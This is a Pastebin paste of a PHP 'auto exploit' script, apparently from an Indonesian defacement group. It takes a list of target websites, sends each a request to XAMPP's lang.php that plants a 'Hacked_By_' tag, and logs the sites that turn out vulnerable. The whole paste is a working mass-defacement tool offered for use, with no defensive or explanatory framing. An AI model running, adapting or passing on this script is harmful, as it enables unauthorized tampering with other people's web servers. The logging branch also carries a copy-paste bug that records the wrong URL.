Advertisement
shor7cut

Auto Exploit : Xampp Lang.php - shor7cut

Jul 21st, 2015
1,202
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. CODE BY shor7cut - Kiddies selalu merubah :v
  2. Thank's : IndoXploit Coders Team & Bug7sec
  3.  
  4. <?php
  5. error_reporting(0);
  6. if(!isset($argv[2])){
  7.     echo "[+] Format : php namefile.php {file list} {notice by} {save file}\r\n";
  8.     echo "[+] Contoh : php namafile.php target.txt shor7cut sukses.txt";
  9. }
  10.  
  11.  
  12. if(!file_exists($argv[1])){
  13.   die('File Tidak ditemukan');
  14. }
  15.  
  16. if(file_exists($argv[2].".txt")){
  17.     $del = $argv[2].".txt";
  18.     unlink($del);
  19. }
  20.  
  21.  
  22. $buka_file = fopen($argv[1], "r");
  23. $baca_file = fgets($buka_file);
  24. $target = explode("|", $baca_file);
  25. $hacker = $argv[2];
  26. $no=1;
  27. $success=0;
  28. $fail=0;
  29. $names = $argv[2].".txt";
  30. echo "<------------{Scan}-------------->\r\n";
  31. echo "-> Notice By ".$argv[2]."\r\n";
  32. echo "-> Target Count : ".count($target)."\r\n";
  33. echo "-> Save File : ".$names."\r\n";
  34. echo "<-------------------------------->\r\n\n";
  35. foreach ($target as $sites) {
  36. echo "-> INFO : [$no/".count($target)."] -( Success : ".$success." | Fail : ".$fail." )-\r\n";
  37. echo "-> $sites | Status : ";
  38. $url1 = "$sites/xampp/lang.php?Hacked_By_$hacker";
  39. $url2 = "$sites/security/lang.php?Hacked_By_$hacker";
  40. $patch_result1 = "$sites/xampp/lang.tmp?";
  41. $patch_result2 = "$sites/security/lang.tmp?";
  42.  
  43. // xampp - patch lang.php\\
  44. $xamppcurl = curl_init("$url1");
  45. curl_setopt($xamppcurl, CURLOPT_FAILONERROR, true);
  46. curl_setopt($xamppcurl, CURLOPT_FOLLOWLOCATION, true);
  47. curl_setopt($xamppcurl, CURLOPT_RETURNTRANSFER, true);
  48. curl_setopt($xamppcurl, CURLOPT_CONNECTTIMEOUT ,0);
  49. curl_setopt($xamppcurl, CURLOPT_TIMEOUT, 30);
  50. $result1 = curl_exec($xamppcurl);
  51.  
  52. $xamppcur2 = curl_init("$url2");
  53. curl_setopt($xamppcur2, CURLOPT_FAILONERROR, true);
  54. curl_setopt($xamppcur2, CURLOPT_FOLLOWLOCATION, true);
  55. curl_setopt($xamppcur2, CURLOPT_RETURNTRANSFER, true);
  56. curl_setopt($xamppcur2, CURLOPT_CONNECTTIMEOUT ,0);
  57. curl_setopt($xamppcur2, CURLOPT_TIMEOUT, 30);
  58. $result2 = curl_exec($xamppcur2);
  59.  
  60.  
  61.  
  62. if(eregi("Hacked_By_",$result1))
  63. {
  64.     echo "vulnerable\r\n";
  65.     echo "-> Patch : ".$patch_result1."\r\n\n";
  66. $fp = fopen($names, 'a');
  67. fwrite($fp, "http://$patch_result1\r\n");
  68. fclose($fp);
  69. $success++;
  70. }else if(eregi("Hacked_By_",$result2))
  71. {
  72.         echo "vulnerable\r\n";
  73.         echo "-> Patch : ".$patch_result2."\r\n\n";
  74. $fp = fopen($names, 'a');
  75. fwrite($fp, "http://$patch_result1\r\n");
  76. fclose($fp);
  77. $success++;
  78. }else {
  79.             echo "Not vulnerable\r\n\n";
  80.             $fail++;
  81. }
  82.  
  83.     flush();
  84.     ob_flush();
  85.     sleep(2);
  86.     $no++;
  87.     }
  88. ?>
Advertisement
RAW Paste Data Copied
Advertisement